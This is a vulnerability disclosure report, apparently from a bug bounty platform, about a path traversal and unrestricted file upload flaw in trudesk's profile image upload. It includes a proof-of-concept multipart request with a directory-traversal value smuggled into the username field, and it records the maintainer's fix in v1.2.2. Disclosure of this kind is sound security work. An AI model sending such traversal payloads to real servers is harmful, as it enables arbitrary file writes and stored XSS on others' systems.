Unrestricted File Upload and Path Traversal in upload image in polonel/trudesk

Valid

Reported on

May 12th 2022


Description

The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.

Proof of Concept

1. Login 
2. Upload profile image
3. Capture request, modify `username` and `filename`
POST /accounts/uploadImage HTTP/1.1
Host: 192.168.20.132:8118
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Origin: http://192.168.20.132:8118
Referer: http://192.168.20.132:8118/accounts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close

------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="username"

/../../../../../../testpathtravesal1
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="_id"

627ce4cd7778b2c5b5f49851
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg

<image content>
------WebKitFormBoundaryQXoDBooqQ26crHR0--

alt text alt text

Impact

Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)

Occurrences

This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type

We are processing your report and will contact the polonel/trudesk team within 24 hours. 2 months ago
tienpa99 modified the report
2 months ago
tienpa99 modified the report
2 months ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back 2 months ago
polonel/trudesk maintainer has acknowledged this report 2 months ago
tienpa99
a month ago

Researcher


Hi, I see you have read the report. Is it hard to understand or the poc doesn't working?

Chris Brame assigned a CVE to this report a month ago
Chris Brame validated this vulnerability a month ago
tienpa99 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Chris Brame
a month ago

Maintainer


This has been fixed in v1.2.2. I will update this report once it has been released.

tienpa99
a month ago

Researcher


Sure. Just update here, I will recheck this issue.

We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. a month ago
Chris Brame confirmed that a fix has been merged on d107f1 a month ago
Chris Brame has been awarded the fix bounty
accounts.js#L485-L505 has been validated
to join this conversation